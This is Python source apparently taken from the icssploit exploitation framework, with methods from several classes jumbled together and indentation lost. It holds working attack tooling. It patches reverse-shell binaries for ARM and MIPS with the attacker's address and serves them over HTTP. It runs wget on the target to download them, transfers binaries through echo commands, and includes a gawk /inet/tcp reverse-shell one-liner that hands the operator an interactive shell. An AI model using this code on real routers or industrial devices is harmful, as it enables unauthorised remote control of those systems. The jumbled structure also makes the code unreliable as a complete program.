def wget(self, binary, location):
print_status("Using wget method")
# generate binary
self.generate_binary(self.lhost, self.lport)
# run http server
thread = threading.Thread(target=self.http_server,
args=(self.lhost, self.lport))
thread.start()
# wget binary
print_status("Using wget to download binary")
cmd = "{} http://{}:{}/{} -O {}/{}".format(binary, self.lhost,
self.lport,
self.binary_name, location,
self.binary_name)
self.exploit.execute(cmd)
# execute binary
sock = self.listen(self.lhost, self.lport)
self.execute_binary(location, self.binary_name)
# waiting for shell
self.shell(sock)
def command_run(self, *args, **kwargs):
utils.print_status("Running module...")
try:
self.current_module.run()
except KeyboardInterrupt:
utils.print_info()
utils.print_error("Operation cancelled by user")
except:
utils.print_error(traceback.format_exc(sys.exc_info()))
def shell(self, sock):
print_status("Waiting for reverse shell...")
client, addr = sock.accept()
sock.close()
print_status("Connection from {}:{}".format(addr[0], addr[1]))
print_success("Enjoy your shell")
t = telnetlib.Telnet()
t.sock = client
t.interact()
def awk(self, binary):
print_status("Using awk method")
# run reverse shell through awk
sock = self.listen(self.lhost, self.lport)
cmd = binary + " 'BEGIN{s=\"/inet/tcp/0/" + self.lhost + "/" + self.lport + "\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)};'"
self.exploit.execute(cmd)
# waiting for shell
self.shell(sock)
def command_check(self, *args, **kwargs):
try:
result = self.current_module.check()
except Exception as error:
utils.print_error(error)
else:
if result is True:
utils.print_success("Target is vulnerable")
elif result is False:
utils.print_error("Target is not vulnerable")
else:
utils.print_status("Target could not be verified")
def generate_binary(self, lhost, lport):
print_status("Generating reverse shell binary")
self.binary_name = random_text(8)
ip = self.convert_ip(lhost)
port = self.convert_port(lport)
if self.arch == 'arm':
self.revshell = self.arm[:0x104] + ip + self.arm[
0x108:0x10a] + port + self.arm[0x10c:]
elif self.arch == 'mipsel':
self.revshell = self.mipsel[:0xe4] + port + self.mipsel[
0xe6:0xf0] + ip[2:] + self.mipsel[
0xf2:0xf4] + ip[:2] + self.mipsel[0xf6:]
elif self.arch == 'mips':
self.revshell = self.mips[:0xea] + port + self.mips[
0xec:0xf2] + ip[:2] + self.mips[0xf4:0xf6] + ip[
2:] + self.mips[0xf8:]
else:
print_error("Platform not supported")
def echo(self, binary, location):
print_status("Using echo method")
# generate binary
self.generate_binary(self.lhost, self.lport)
path = "{}/{}".format(location, self.binary_name)
size = len(self.revshell)
num_parts = (size / 30) + 1
# transfer binary through echo command
print_status("Using echo method to transfer binary")
for i in range(0, num_parts):
current = i * 30
print_status("Transferring {}/{} bytes".format(
current, len(self.revshell)))
block = self.revshell[current:current + 30].encode('hex')
block = "\\\\x" + "\\\\x".join(
a + b for a, b in zip(block[::2], block[1::2]))
cmd = 'echo -ne "{}" >> {}'.format(block, path)
self.exploit.execute(cmd)
# execute binary
sock = self.listen(self.lhost, self.lport)
self.execute_binary(location, self.binary_name)
# waiting for shell
self.shell(sock)
def start(self):
""" icssploit main entry point. Starting interpreter loop. """
utils.print_info(self.banner)
printer_queue.join()
while True:
try:
command, args = self.parse_line(raw_input(self.prompt))
if not command:
continue
command_handler = self.get_command_handler(command)
command_handler(args)
except icssploitException as err:
utils.print_error(err)
except EOFError:
utils.print_info()
utils.print_status("icssploit stopped")
break
except KeyboardInterrupt:
utils.print_info()
finally:
printer_queue.join()
def run_threads(self, threads, target, *args, **kwargs):
workers = []
threads_running = threading.Event()
threads_running.set()
for worker_id in range(int(threads)):
worker = threading.Thread(
target=target,
args=chain((threads_running, ), args),
kwargs=kwargs,
name='worker-{}'.format(worker_id),
)
workers.append(worker)
worker.start()
start = time.time()
try:
while worker.isAlive():
worker.join(1)
except KeyboardInterrupt:
threads_running.clear()
for worker in workers:
worker.join()
print_status('Elapsed time: ', time.time() - start, 'seconds')
def http_server(self, lhost, lport):
print_status("Setting up HTTP server")
server = HttpServer((lhost, int(lport)), HttpRequestHandler)
server.serve_forever(self.revshell)
server.server_close()
